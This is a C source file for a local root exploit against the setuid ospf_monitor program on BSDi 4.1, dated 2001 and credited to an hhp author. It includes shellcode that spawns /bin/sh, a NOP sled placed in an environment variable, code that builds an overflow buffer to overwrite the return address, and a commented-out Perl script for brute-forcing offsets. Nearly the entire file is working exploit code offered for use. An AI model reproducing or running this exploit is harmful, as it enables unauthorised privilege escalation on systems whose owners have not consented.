/*********************************************************************
 * (ospf_monitor) Local root[uid=0] exploit tested on BSDi 4.1 x86.  *
 * Author: Cody Tubbs (loophole of hhp).                             *
 * Site:   http://www.hhp-programming.net/                           *
 * Email:  pigspigs@yahoo.com                                        *
 * Date:   2/23/2001 12:12:32 PST. (NOT CST(TX), :).                 *
 *********************************************************************/

/* ------------- hhp-offset_bruteforce.pl ---------------
#!/usr/bin/perl
#Standard offset/align brute.
if(@ARGV < 3){
 print "Usage: $0 <start> <stop> <align>\n";
 print "Examp: $0 -10000 0 0\n";
 print "Notes: align = 0 through 3\n";
 exit(0);
}

($start, $stop, $align) = @ARGV;
for(;$start<=$stop;$start+=4){
 system "./x $start $align";
}
**********************************************/

#include <stdio.h>

#define PATH   "/usr/contrib/bin/ospf_monitor" // Change path if needed.
#define OFFSET -3600                           // Worked, brute ifelse.
#define ALLIGN 2                               // Should not be changed.
#define NOP    0x90                            // x86.
#define DBUF   998                             // 986+4(EBP(hhp!))+4(EIP).
#define HHP    988                             // allign+988=(990) (mypad)
#define RET    0x804741c                       // Unpunch below if wanted.

static char shellcode[] = //BSDi (Replace with setuid(0), etc code).
 "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
 "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
 "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
 "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
 "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
 "\x02\x02\x02/bin/sh.-c.sh\x69";

long get_sp(void){__asm__("movl %esp,%eax");}

void workit(char *heh){
 fprintf(stderr, "(*) (ospf_monitor) Local root exploit.\n");
 fprintf(stderr, "(*) Author: Cody Tubbs (loophole of hhp).\n");
 fprintf(stderr, "(*) Tested on BSDi 4.1 - x86.\n");
 fprintf(stderr, "(*) Usage: %s [offset] [allign(0..3)]\n", heh);
}

main(int argc, char **argv){
 char eipeip[DBUF], buffer[4096], heh[DBUF+1];
 int i, offset, allign;
 long address;
 workit(argv[0]);
 if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
 if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

 address = get_sp()-offset;
 //address = RET; //Decomment if desired.
 
if(allign>0){
  for(i=0;i<allign;i++){
   eipeip[i]   = 0x69; //0x69(TM) :D
   eipeip[++i] = 0x08; //Delete 0x69(TM) :(
  }
 }

//for(i=allign;i<HHP;i++){eipeip[i] = 0x08;}//Delete shellcode scrolling.
for(i=allign;i<HHP;i++){ //Print hhp padding before shellcode.
 eipeip[i]   = 0x68;
 eipeip[++i] = 0x68;
 eipeip[++i] = 0x70;
 eipeip[++i] = 0x20;
}

 for(i=allign+HHP;i<DBUF;i+=4){
  *(long *)&eipeip[i] = address;
 }

 for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
  buffer[i] = NOP;
 }

 memcpy(buffer+i, shellcode, strlen(shellcode));
 memcpy(buffer, "OSPFEX=", 7);
 putenv(buffer);
 fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign);
 execlp(PATH, "ospf_monitor", eipeip, 0);
}